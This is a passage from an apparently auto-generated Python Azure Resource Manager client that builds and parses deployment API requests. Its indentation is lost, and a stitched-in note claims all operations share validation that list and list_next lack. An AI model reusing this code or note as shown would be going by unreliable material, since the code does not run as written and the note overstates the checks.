url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = DeploymentOperationsListResult(operations=[])
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
value_array = response_doc.get('value', None)
if value_array is not None:
for value_value in value_array:
deployment_operation_instance = DeploymentOperation()
result.operations.append(deployment_operation_instance)
id_value = value_value.get('id', None)
if id_value is not None:
id_instance = id_value
deployment_operation_instance.id = id_instance
operation_id_value = value_value.get('operationId', None)
if operation_id_value is not None:
operation_id_instance = operation_id_value
deployment_operation_instance.operation_id = operation_id_instance
properties_value = value_value.get('properties', None)
if properties_value is not None:
properties_instance = DeploymentOperationProperties()
deployment_operation_instance.properties = properties_instance
provisioning_state_value = properties_value.get('provisioningState', None)
if provisioning_state_value is not None:
provisioning_state_instance = provisioning_state_value
properties_instance.provisioning_state = provisioning_state_instance
timestamp_value = properties_value.get('timestamp', None)
if timestamp_value is not None:
timestamp_instance = timestamp_value
properties_instance.timestamp = timestamp_instance
status_code_value = properties_value.get('statusCode', None)
if status_code_value is not None:
status_code_instance = status_code_value
properties_instance.status_code = status_code_instance
status_message_value = properties_value.get('statusMessage', None)
if status_message_value is not None:
status_message_instance = json.dumps(status_message_value)
properties_instance.status_message = status_message_instance
target_resource_value = properties_value.get('targetResource', None)
if target_resource_value is not None:
target_resource_instance = TargetResource()
properties_instance.target_resource = target_resource_instance
id_value2 = target_resource_value.get('id', None)
if id_value2 is not None:
id_instance2 = id_value2
target_resource_instance.id = id_instance2
resource_name_value = target_resource_value.get('resourceName', None)
if resource_name_value is not None:
resource_name_instance = resource_name_value
target_resource_instance.resource_name = resource_name_instance
resource_type_value = target_resource_value.get('resourceType', None)
if resource_type_value is not None:
resource_type_instance = resource_type_value
target_resource_instance.resource_type = resource_type_instance
odatanext_link_value = response_doc.get('@odata.nextLink', None)
if odatanext_link_value is not None:
odatanext_link_instance = odatanext_link_value
result.next_link = odatanext_link_instance
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
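Each of these operations repeats the same `resource_group_name` checks: non-None, at most 1000 characters, and matching a character-class pattern. A standalone replica of that validation (pattern and limits copied from the methods above):

```python
import re

# Standalone replica of the resource_group_name validation used by
# these operations.
def validate_resource_group_name(name):
    if name is None:
        raise ValueError('resource_group_name cannot be None.')
    if len(name) > 1000 or re.search(r'^[-\w\._]+$', name) is None:
        raise IndexError('resource_group_name is outside the valid range.')
```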
def list_next(self, next_link):
"""
Gets the next page of deployment operations.
Args:
next_link (string): NextLink from the previous successful call to the
List operation.
Returns:
DeploymentOperationsListResult: List of deployment operations.
"""
# Validate
if next_link is None:
raise ValueError('next_link cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + next_link
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = DeploymentOperationsListResult(operations=[])
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
value_array = response_doc.get('value', None)
if value_array is not None:
for value_value in value_array:
deployment_operation_instance = DeploymentOperation()
result.operations.append(deployment_operation_instance)
id_value = value_value.get('id', None)
if id_value is not None:
id_instance = id_value
deployment_operation_instance.id = id_instance
operation_id_value = value_value.get('operationId', None)
if operation_id_value is not None:
operation_id_instance = operation_id_value
deployment_operation_instance.operation_id = operation_id_instance
properties_value = value_value.get('properties', None)
if properties_value is not None:
properties_instance = DeploymentOperationProperties()
deployment_operation_instance.properties = properties_instance
provisioning_state_value = properties_value.get('provisioningState', None)
if provisioning_state_value is not None:
provisioning_state_instance = provisioning_state_value
properties_instance.provisioning_state = provisioning_state_instance
timestamp_value = properties_value.get('timestamp', None)
if timestamp_value is not None:
timestamp_instance = timestamp_value
properties_instance.timestamp = timestamp_instance
status_code_value = properties_value.get('statusCode', None)
if status_code_value is not None:
status_code_instance = status_code_value
properties_instance.status_code = status_code_instance
status_message_value = properties_value.get('statusMessage', None)
if status_message_value is not None:
status_message_instance = json.dumps(status_message_value)
properties_instance.status_message = status_message_instance
target_resource_value = properties_value.get('targetResource', None)
if target_resource_value is not None:
target_resource_instance = TargetResource()
properties_instance.target_resource = target_resource_instance
id_value2 = target_resource_value.get('id', None)
if id_value2 is not None:
id_instance2 = id_value2
target_resource_instance.id = id_instance2
resource_name_value = target_resource_value.get('resourceName', None)
if resource_name_value is not None:
resource_name_instance = resource_name_value
target_resource_instance.resource_name = resource_name_instance
resource_type_value = target_resource_value.get('resourceType', None)
if resource_type_value is not None:
resource_type_instance = resource_type_value
target_resource_instance.resource_type = resource_type_instance
odatanext_link_value = response_doc.get('@odata.nextLink', None)
if odatanext_link_value is not None:
odatanext_link_instance = odatanext_link_value
result.next_link = odatanext_link_instance
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
class DeploymentOperations(object):
"""
Operations for managing deployments.
__NOTE__: An instance of this class is automatically created for each
instance of ResourceManagementClient.
"""
def __init__(self, client):
self._client = client
@property
def client(self):
"""
Gets a reference to the owning ResourceManagementClient.
"""
return self._client
def cancel(self, resource_group_name, deployment_name):
"""
Cancel a currently running template deployment.
Args:
resource_group_name (string): The name of the resource group. The name
is case insensitive.
deployment_name (string): The name of the deployment.
Returns:
AzureOperationResponse: A standard service response including an HTTP
status code and request ID.
"""
# Validate
if resource_group_name is None:
raise ValueError('resource_group_name cannot be None.')
if resource_group_name is not None and len(resource_group_name) > 1000:
raise IndexError('resource_group_name is outside the valid range.')
if re.search(r'^[-\w\._]+$', resource_group_name) is None:
raise IndexError('resource_group_name is outside the valid range.')
if deployment_name is None:
raise ValueError('deployment_name cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/resourcegroups/'
url = url + quote(resource_group_name)
url = url + '/deployments/'
url = url + quote(deployment_name)
url = url + '/cancel'
query_parameters = []
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url.endswith('/'):
base_url = base_url[:-1]
if url.startswith('/'):
url = url[1:]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'POST'
# Set Headers
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 204:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = AzureOperationResponse()
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def create_or_update(self, resource_group_name, deployment_name, parameters):
"""
Create a named template deployment using a template.
Args:
resource_group_name (string): The name of the resource group. The name
is case insensitive.
deployment_name (string): The name of the deployment.
parameters (Deployment): Additional parameters supplied to the
operation.
Returns:
DeploymentOperationsCreateResult: Template deployment operation create
result.
"""
# Validate
if resource_group_name is None:
raise ValueError('resource_group_name cannot be None.')
if len(resource_group_name) > 1000:
raise IndexError('resource_group_name is outside the valid range.')
if re.search(r'^[-\w\._]+$', resource_group_name) is None:
raise IndexError('resource_group_name is outside the valid range.')
if deployment_name is None:
raise ValueError('deployment_name cannot be None.')
if parameters is None:
raise ValueError('parameters cannot be None.')
if parameters.properties is not None:
if parameters.properties.parameters_link is not None:
if parameters.properties.parameters_link.uri is None:
raise ValueError('parameters.properties.parameters_link.uri cannot be None.')
if parameters.properties.template_link is not None:
if parameters.properties.template_link.uri is None:
raise ValueError('parameters.properties.template_link.uri cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/resourcegroups/'
url = url + quote(resource_group_name)
url = url + '/deployments/'
url = url + quote(deployment_name)
query_parameters = []
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url.endswith('/'):
base_url = base_url[:-1]
if url.startswith('/'):
url = url[1:]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'PUT'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Serialize Request
request_content = None
request_doc = None
deployment_value = {}
request_doc = deployment_value
if parameters.properties is not None:
properties_value = {}
deployment_value['properties'] = properties_value
if parameters.properties.template is not None:
properties_value['template'] = json.loads(parameters.properties.template)
if parameters.properties.template_link is not None:
template_link_value = {}
properties_value['templateLink'] = template_link_value
template_link_value['uri'] = parameters.properties.template_link.uri
if parameters.properties.template_link.content_version is not None:
template_link_value['contentVersion'] = parameters.properties.template_link.content_version
if parameters.properties.parameters is not None:
properties_value['parameters'] = json.loads(parameters.properties.parameters)
if parameters.properties.parameters_link is not None:
parameters_link_value = {}
properties_value['parametersLink'] = parameters_link_value
parameters_link_value['uri'] = parameters.properties.parameters_link.uri
if parameters.properties.parameters_link.content_version is not None:
parameters_link_value['contentVersion'] = parameters.properties.parameters_link.content_version
if parameters.properties.mode is not None:
properties_value['mode'] = str(parameters.properties.mode)
request_content = json.dumps(request_doc)
http_request.data = request_content
http_request.headers['Content-Length'] = str(len(request_content))
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200 and status_code != 201:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200 or status_code == 201:
response_content = body
result = DeploymentOperationsCreateResult()
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
deployment_instance = DeploymentExtended()
result.deployment = deployment_instance
id_value = response_doc.get('id', None)
if id_value is not None:
id_instance = id_value
deployment_instance.id = id_instance
name_value = response_doc.get('name', None)
if name_value is not None:
name_instance = name_value
deployment_instance.name = name_instance
properties_value2 = response_doc.get('properties', None)
if properties_value2 is not None:
properties_instance = DeploymentPropertiesExtended(dependencies=[], providers=[])
deployment_instance.properties = properties_instance
provisioning_state_value = properties_value2.get('provisioningState', None)
if provisioning_state_value is not None:
provisioning_state_instance = provisioning_state_value
properties_instance.provisioning_state = provisioning_state_instance
correlation_id_value = properties_value2.get('correlationId', None)
if correlation_id_value is not None:
correlation_id_instance = correlation_id_value
properties_instance.correlation_id = correlation_id_instance
timestamp_value = properties_value2.get('timestamp', None)
if timestamp_value is not None:
timestamp_instance = timestamp_value
properties_instance.timestamp = timestamp_instance
outputs_value = properties_value2.get('outputs', None)
if outputs_value is not None:
outputs_instance = json.dumps(outputs_value)
properties_instance.outputs = outputs_instance
providers_array = properties_value2.get('providers', None)
if providers_array is not None:
for providers_value in providers_array:
provider_instance = Provider(resource_types=[])
properties_instance.providers.append(provider_instance)
id_value2 = providers_value.get('id', None)
if id_value2 is not None:
id_instance2 = id_value2
provider_instance.id = id_instance2
namespace_value = providers_value.get('namespace', None)
if namespace_value is not None:
namespace_instance = namespace_value
provider_instance.namespace = namespace_instance
registration_state_value = providers_value.get('registrationState', None)
if registration_state_value is not None:
registration_state_instance = registration_state_value
provider_instance.registration_state = registration_state_instance
resource_types_array = providers_value.get('resourceTypes', None)
if resource_types_array is not None:
for resource_types_value in resource_types_array:
provider_resource_type_instance = ProviderResourceType(api_versions=[], locations=[], properties={})
provider_instance.resource_types.append(provider_resource_type_instance)
resource_type_value = resource_types_value.get('resourceType', None)
if resource_type_value is not None:
resource_type_instance = resource_type_value
provider_resource_type_instance.name = resource_type_instance
locations_array = resource_types_value.get('locations', None)
if locations_array is not None:
for locations_value in locations_array:
provider_resource_type_instance.locations.append(locations_value)
api_versions_array = resource_types_value.get('apiVersions', None)
if api_versions_array is not None:
for api_versions_value in api_versions_array:
provider_resource_type_instance.api_versions.append(api_versions_value)
properties_sequence_element = resource_types_value.get('properties', None)
if properties_sequence_element is not None:
for properties_key, properties_value3 in properties_sequence_element.items():
provider_resource_type_instance.properties[properties_key] = properties_value3
dependencies_array = properties_value2.get('dependencies', None)
if dependencies_array is not None:
for dependencies_value in dependencies_array:
dependency_instance = Dependency(depends_on=[])
properties_instance.dependencies.append(dependency_instance)
depends_on_array = dependencies_value.get('dependsOn', None)
if depends_on_array is not None:
for depends_on_value in depends_on_array:
basic_dependency_instance = BasicDependency()
dependency_instance.depends_on.append(basic_dependency_instance)
id_value3 = depends_on_value.get('id', None)
if id_value3 is not None:
id_instance3 = id_value3
basic_dependency_instance.id = id_instance3
resource_type_value2 = depends_on_value.get('resourceType', None)
if resource_type_value2 is not None:
resource_type_instance2 = resource_type_value2
basic_dependency_instance.resource_type = resource_type_instance2
resource_name_value = depends_on_value.get('resourceName', None)
if resource_name_value is not None:
resource_name_instance = resource_name_value
basic_dependency_instance.resource_name = resource_name_instance
id_value4 = dependencies_value.get('id', None)
if id_value4 is not None:
id_instance4 = id_value4
dependency_instance.id = id_instance4
resource_type_value3 = dependencies_value.get('resourceType', None)
if resource_type_value3 is not None:
resource_type_instance3 = resource_type_value3
dependency_instance.resource_type = resource_type_instance3
resource_name_value2 = dependencies_value.get('resourceName', None)
if resource_name_value2 is not None:
resource_name_instance2 = resource_name_value2
dependency_instance.resource_name = resource_name_instance2
template_value = properties_value2.get('template', None)
if template_value is not None:
template_instance = json.dumps(template_value)
properties_instance.template = template_instance
template_link_value2 = properties_value2.get('templateLink', None)
if template_link_value2 is not None:
template_link_instance = TemplateLink()
properties_instance.template_link = template_link_instance
uri_value = template_link_value2.get('uri', None)
if uri_value is not None:
uri_instance = uri_value
template_link_instance.uri = uri_instance
content_version_value = template_link_value2.get('contentVersion', None)
if content_version_value is not None:
content_version_instance = content_version_value
template_link_instance.content_version = content_version_instance
parameters_value = properties_value2.get('parameters', None)
if parameters_value is not None:
parameters_instance = json.dumps(parameters_value)
properties_instance.parameters = parameters_instance
parameters_link_value2 = properties_value2.get('parametersLink', None)
if parameters_link_value2 is not None:
parameters_link_instance = ParametersLink()
properties_instance.parameters_link = parameters_link_instance
uri_value2 = parameters_link_value2.get('uri', None)
if uri_value2 is not None:
uri_instance2 = uri_value2
parameters_link_instance.uri = uri_instance2
content_version_value2 = parameters_link_value2.get('contentVersion', None)
if content_version_value2 is not None:
content_version_instance2 = content_version_value2
parameters_link_instance.content_version = content_version_instance2
mode_value = properties_value2.get('mode', None)
if mode_value is not None:
mode_instance = mode_value
properties_instance.mode = mode_instance
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def get(self, resource_group_name, deployment_name):
"""
Get a deployment.
Args:
resource_group_name (string): The name of the resource group. The name
is case insensitive.
deployment_name (string): The name of the deployment.
Returns:
DeploymentGetResult: Template deployment information.
"""
# Validate
if resource_group_name is None:
raise ValueError('resource_group_name cannot be None.')
if len(resource_group_name) > 1000:
raise IndexError('resource_group_name is outside the valid range.')
if re.search(r'^[-\w\._]+$', resource_group_name) is None:
raise IndexError('resource_group_name is outside the valid range.')
if deployment_name is None:
raise ValueError('deployment_name cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/resourcegroups/'
url = url + quote(resource_group_name)
url = url + '/deployments/'
url = url + quote(deployment_name)
query_parameters = []
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url.endswith('/'):
base_url = base_url[:-1]
if url.startswith('/'):
url = url[1:]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = DeploymentGetResult()
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
deployment_instance = DeploymentExtended()
result.deployment = deployment_instance
id_value = response_doc.get('id', None)
if id_value is not None:
id_instance = id_value
deployment_instance.id = id_instance
name_value = response_doc.get('name', None)
if name_value is not None:
name_instance = name_value
deployment_instance.name = name_instance
properties_value = response_doc.get('properties', None)
if properties_value is not None:
properties_instance = DeploymentPropertiesExtended(dependencies=[], providers=[])
deployment_instance.properties = properties_instance
provisioning_state_value = properties_value.get('provisioningState', None)
if provisioning_state_value is not None:
provisioning_state_instance = provisioning_state_value
properties_instance.provisioning_state = provisioning_state_instance
correlation_id_value = properties_value.get('correlationId', None)
if correlation_id_value is not None:
correlation_id_instance = correlation_id_value
properties_instance.correlation_id = correlation_id_instance
timestamp_value = properties_value.get('timestamp', None)
if timestamp_value is not None:
timestamp_instance = timestamp_value
properties_instance.timestamp = timestamp_instance
outputs_value = properties_value.get('outputs', None)
if outputs_value is not None:
outputs_instance = json.dumps(outputs_value)
properties_instance.outputs = outputs_instance
providers_array = properties_value.get('providers', None)
if providers_array is not None:
for providers_value in providers_array:
provider_instance = Provider(resource_types=[])
properties_instance.providers.append(provider_instance)
id_value2 = providers_value.get('id', None)
if id_value2 is not None:
id_instance2 = id_value2
provider_instance.id = id_instance2
namespace_value = providers_value.get('namespace', None)
if namespace_value is not None:
namespace_instance = namespace_value
provider_instance.namespace = namespace_instance
registration_state_value = providers_value.get('registrationState', None)
if registration_state_value is not None:
registration_state_instance = registration_state_value
provider_instance.registration_state = registration_state_instance
resource_types_array = providers_value.get('resourceTypes', None)
if resource_types_array is not None:
for resource_types_value in resource_types_array:
provider_resource_type_instance = ProviderResourceType(api_versions=[], locations=[], properties={})
provider_instance.resource_types.append(provider_resource_type_instance)
resource_type_value = resource_types_value.get('resourceType', None)
if resource_type_value is not None:
resource_type_instance = resource_type_value
provider_resource_type_instance.name = resource_type_instance
locations_array = resource_types_value.get('locations', None)
if locations_array is not None:
for locations_value in locations_array:
provider_resource_type_instance.locations.append(locations_value)
api_versions_array = resource_types_value.get('apiVersions', None)
if api_versions_array is not None:
for api_versions_value in api_versions_array:
provider_resource_type_instance.api_versions.append(api_versions_value)
properties_sequence_element = resource_types_value.get('properties', None)
if properties_sequence_element is not None:
for properties_key, properties_value2 in properties_sequence_element.items():
provider_resource_type_instance.properties[properties_key] = properties_value2
dependencies_array = properties_value.get('dependencies', None)
if dependencies_array is not None:
for dependencies_value in dependencies_array:
dependency_instance = Dependency(depends_on=[])
properties_instance.dependencies.append(dependency_instance)
depends_on_array = dependencies_value.get('dependsOn', None)
if depends_on_array is not None:
for depends_on_value in depends_on_array:
basic_dependency_instance = BasicDependency()
dependency_instance.depends_on.append(basic_dependency_instance)
id_value3 = depends_on_value.get('id', None)
if id_value3 is not None:
id_instance3 = id_value3
basic_dependency_instance.id = id_instance3
resource_type_value2 = depends_on_value.get('resourceType', None)
if resource_type_value2 is not None:
resource_type_instance2 = resource_type_value2
basic_dependency_instance.resource_type = resource_type_instance2
resource_name_value = depends_on_value.get('resourceName', None)
if resource_name_value is not None:
resource_name_instance = resource_name_value
basic_dependency_instance.resource_name = resource_name_instance
id_value4 = dependencies_value.get('id', None)
if id_value4 is not None:
id_instance4 = id_value4
dependency_instance.id = id_instance4
resource_type_value3 = dependencies_value.get('resourceType', None)
if resource_type_value3 is not None:
resource_type_instance3 = resource_type_value3
dependency_instance.resource_type = resource_type_instance3
resource_name_value2 = dependencies_value.get('resourceName', None)
if resource_name_value2 is not None:
resource_name_instance2 = resource_name_value2
dependency_instance.resource_name = resource_name_instance2
template_value = properties_value.get('template', None)
if template_value is not None:
template_instance = json.dumps(template_value)
properties_instance.template = template_instance
template_link_value = properties_value.get('templateLink', None)
if template_link_value is not None:
template_link_instance = TemplateLink()
properties_instance.template_link = template_link_instance
uri_value = template_link_value.get('uri', None)
if uri_value is not None:
uri_instance = uri_value
template_link_instance.uri = uri_instance
content_version_value = template_link_value.get('contentVersion', None)
if content_version_value is not None:
content_version_instance = content_version_value
template_link_instance.content_version = content_version_instance
parameters_value = properties_value.get('parameters', None)
if parameters_value is not None:
parameters_instance = json.dumps(parameters_value)
properties_instance.parameters = parameters_instance
parameters_link_value = properties_value.get('parametersLink', None)
if parameters_link_value is not None:
parameters_link_instance = ParametersLink()
properties_instance.parameters_link = parameters_link_instance
uri_value2 = parameters_link_value.get('uri', None)
if uri_value2 is not None:
uri_instance2 = uri_value2
parameters_link_instance.uri = uri_instance2
content_version_value2 = parameters_link_value.get('contentVersion', None)
if content_version_value2 is not None:
content_version_instance2 = content_version_value2
parameters_link_instance.content_version = content_version_instance2
mode_value = properties_value.get('mode', None)
if mode_value is not None:
mode_instance = mode_value
properties_instance.mode = mode_instance
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def list(self, resource_group_name, parameters):
"""
Get a list of deployments.
Args:
resource_group_name (string): The name of the resource group to filter
by. The name is case insensitive.
parameters (DeploymentListParameters): Query parameters. If None is
passed, all deployments are returned.
Returns:
DeploymentListResult: List of deployments.
"""
# Validate
if resource_group_name is None:
raise ValueError('resource_group_name cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/'
url = url + 'resourcegroups/' + quote(resource_group_name) + '/'
url = url + 'deployments/'
query_parameters = []
odata_filter = []
if parameters is not None and parameters.provisioning_state is not None:
odata_filter.append('provisioningState eq \'' + quote(parameters.provisioning_state) + '\'')
if len(odata_filter) > 0:
query_parameters.append('$filter=' + ''.join(odata_filter))
if parameters is not None and parameters.top is not None:
query_parameters.append('$top=' + quote(str(parameters.top)))
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url.endswith('/'):
base_url = base_url[:-1]
if url.startswith('/'):
url = url[1:]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = DeploymentListResult(deployments=[])
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
value_array = response_doc.get('value', None)
if value_array is not None:
for value_value in value_array:
deployment_extended_instance = DeploymentExtended()
result.deployments.append(deployment_extended_instance)
id_value = value_value.get('id', None)
if id_value is not None:
id_instance = id_value
deployment_extended_instance.id = id_instance
name_value = value_value.get('name', None)
if name_value is not None:
name_instance = name_value
deployment_extended_instance.name = name_instance
properties_value = value_value.get('properties', None)
if properties_value is not None:
properties_instance = DeploymentPropertiesExtended(dependencies=[], providers=[])
deployment_extended_instance.properties = properties_instance
provisioning_state_value = properties_value.get('provisioningState', None)
if provisioning_state_value is not None:
provisioning_state_instance = provisioning_state_value
properties_instance.provisioning_state = provisioning_state_instance
correlation_id_value = properties_value.get('correlationId', None)
if correlation_id_value is not None:
correlation_id_instance = correlation_id_value
properties_instance.correlation_id = correlation_id_instance
timestamp_value = properties_value.get('timestamp', None)
if timestamp_value is not None:
timestamp_instance = timestamp_value
properties_instance.timestamp = timestamp_instance
outputs_value = properties_value.get('outputs', None)
if outputs_value is not None:
outputs_instance = json.dumps(outputs_value)
properties_instance.outputs = outputs_instance
providers_array = properties_value.get('providers', None)
if providers_array is not None:
for providers_value in providers_array:
provider_instance = Provider(resource_types=[])
properties_instance.providers.append(provider_instance)
id_value2 = providers_value.get('id', None)
if id_value2 is not None:
id_instance2 = id_value2
provider_instance.id = id_instance2
namespace_value = providers_value.get('namespace', None)
if namespace_value is not None:
namespace_instance = namespace_value
provider_instance.namespace = namespace_instance
registration_state_value = providers_value.get('registrationState', None)
if registration_state_value is not None:
registration_state_instance = registration_state_value
provider_instance.registration_state = registration_state_instance
resource_types_array = providers_value.get('resourceTypes', None)
if resource_types_array is not None:
for resource_types_value in resource_types_array:
provider_resource_type_instance = ProviderResourceType(api_versions=[], locations=[], properties={})
provider_instance.resource_types.append(provider_resource_type_instance)
resource_type_value = resource_types_value.get('resourceType', None)
if resource_type_value is not None:
resource_type_instance = resource_type_value
provider_resource_type_instance.name = resource_type_instance
locations_array = resource_types_value.get('locations', None)
if locations_array is not None:
for locations_value in locations_array:
provider_resource_type_instance.locations.append(locations_value)
api_versions_array = resource_types_value.get('apiVersions', None)
if api_versions_array is not None:
for api_versions_value in api_versions_array:
provider_resource_type_instance.api_versions.append(api_versions_value)
properties_sequence_element = resource_types_value.get('properties', None)
if properties_sequence_element is not None:
for properties_key, properties_value2 in properties_sequence_element.items():
provider_resource_type_instance.properties[properties_key] = properties_value2
dependencies_array = properties_value.get('dependencies', None)
if dependencies_array is not None:
for dependencies_value in dependencies_array:
dependency_instance = Dependency(depends_on=[])
properties_instance.dependencies.append(dependency_instance)
depends_on_array = dependencies_value.get('dependsOn', None)
if depends_on_array is not None:
for depends_on_value in depends_on_array:
basic_dependency_instance = BasicDependency()
dependency_instance.depends_on.append(basic_dependency_instance)
id_value3 = depends_on_value.get('id', None)
if id_value3 is not None:
id_instance3 = id_value3
basic_dependency_instance.id = id_instance3
resource_type_value2 = depends_on_value.get('resourceType', None)
if resource_type_value2 is not None:
resource_type_instance2 = resource_type_value2
basic_dependency_instance.resource_type = resource_type_instance2
resource_name_value = depends_on_value.get('resourceName', None)
if resource_name_value is not None:
resource_name_instance = resource_name_value
basic_dependency_instance.resource_name = resource_name_instance
id_value4 = dependencies_value.get('id', None)
if id_value4 is not None:
id_instance4 = id_value4
dependency_instance.id = id_instance4
resource_type_value3 = dependencies_value.get('resourceType', None)
if resource_type_value3 is not None:
resource_type_instance3 = resource_type_value3
dependency_instance.resource_type = resource_type_instance3
resource_name_value2 = dependencies_value.get('resourceName', None)
if resource_name_value2 is not None:
resource_name_instance2 = resource_name_value2
dependency_instance.resource_name = resource_name_instance2
template_value = properties_value.get('template', None)
if template_value is not None:
template_instance = json.dumps(template_value)
properties_instance.template = template_instance
template_link_value = properties_value.get('templateLink', None)
if template_link_value is not None:
template_link_instance = TemplateLink()
properties_instance.template_link = template_link_instance
uri_value = template_link_value.get('uri', None)
if uri_value is not None:
uri_instance = uri_value
template_link_instance.uri = uri_instance
content_version_value = template_link_value.get('contentVersion', None)
if content_version_value is not None:
content_version_instance = content_version_value
template_link_instance.content_version = content_version_instance
parameters_value = properties_value.get('parameters', None)
if parameters_value is not None:
parameters_instance = json.dumps(parameters_value)
properties_instance.parameters = parameters_instance
parameters_link_value = properties_value.get('parametersLink', None)
if parameters_link_value is not None:
parameters_link_instance = ParametersLink()
properties_instance.parameters_link = parameters_link_instance
uri_value2 = parameters_link_value.get('uri', None)
if uri_value2 is not None:
uri_instance2 = uri_value2
parameters_link_instance.uri = uri_instance2
content_version_value2 = parameters_link_value.get('contentVersion', None)
if content_version_value2 is not None:
content_version_instance2 = content_version_value2
parameters_link_instance.content_version = content_version_instance2
mode_value = properties_value.get('mode', None)
if mode_value is not None:
mode_instance = mode_value
properties_instance.mode = mode_instance
odatanext_link_value = response_doc.get('@odata.nextLink', None)
if odatanext_link_value is not None:
odatanext_link_instance = odatanext_link_value
result.next_link = odatanext_link_instance
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def list_next(self, next_link):
"""
Get a list of deployments.
Args:
next_link (string): NextLink from the previous successful call to List
operation.
Returns:
DeploymentListResult: List of deployments.
"""
# Validate
if next_link is None:
raise ValueError('next_link cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + next_link
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = DeploymentListResult(deployments=[])
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
value_array = response_doc.get('value', None)
if value_array is not None:
for value_value in value_array:
deployment_extended_instance = DeploymentExtended()
result.deployments.append(deployment_extended_instance)
id_value = value_value.get('id', None)
if id_value is not None:
id_instance = id_value
deployment_extended_instance.id = id_instance
name_value = value_value.get('name', None)
if name_value is not None:
name_instance = name_value
deployment_extended_instance.name = name_instance
properties_value = value_value.get('properties', None)
if properties_value is not None:
properties_instance = DeploymentPropertiesExtended(dependencies=[], providers=[])
deployment_extended_instance.properties = properties_instance
provisioning_state_value = properties_value.get('provisioningState', None)
if provisioning_state_value is not None:
provisioning_state_instance = provisioning_state_value
properties_instance.provisioning_state = provisioning_state_instance
correlation_id_value = properties_value.get('correlationId', None)
if correlation_id_value is not None:
correlation_id_instance = correlation_id_value
properties_instance.correlation_id = correlation_id_instance
